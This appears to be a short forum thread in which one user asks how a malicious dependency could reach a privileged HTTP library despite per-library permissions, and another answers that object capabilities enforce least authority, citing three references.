|
|
|
|
|
|
by snek
2752 days ago
|
|
|
What would be the sane behaviour for the following situation? my app imports an http request library and gives it net permissions my app imports a templating library and gives it no permissions the templating library is malicious and tries to import well known http request libraries, and finds the one i imported, which has been given net permissions. or what if you give the templating library a mixin of some sort which accidentally exposes the privileged http library |
|
|
The best way to enforce POLA, and especially this particular problem of not allowing libraries to have access to each other, is object capabilities (ocaps) [3]. An object capability combines designation with authority -- if you have access to a capability, you can use it. If you don't have access, you can't use it. You can think of this (very roughly) as a key to a car as opposed to your name being on a guest list for a party. I didn't really touch on ocaps in this piece, but it's a necessary component for being able to enforce POLA well.
[1] https://developers.google.com/caja/
[2] https://www.youtube.com/watch?v=3ME7oHHQbuM
[3] http://habitatchronicles.com/2017/05/what-are-capabilities/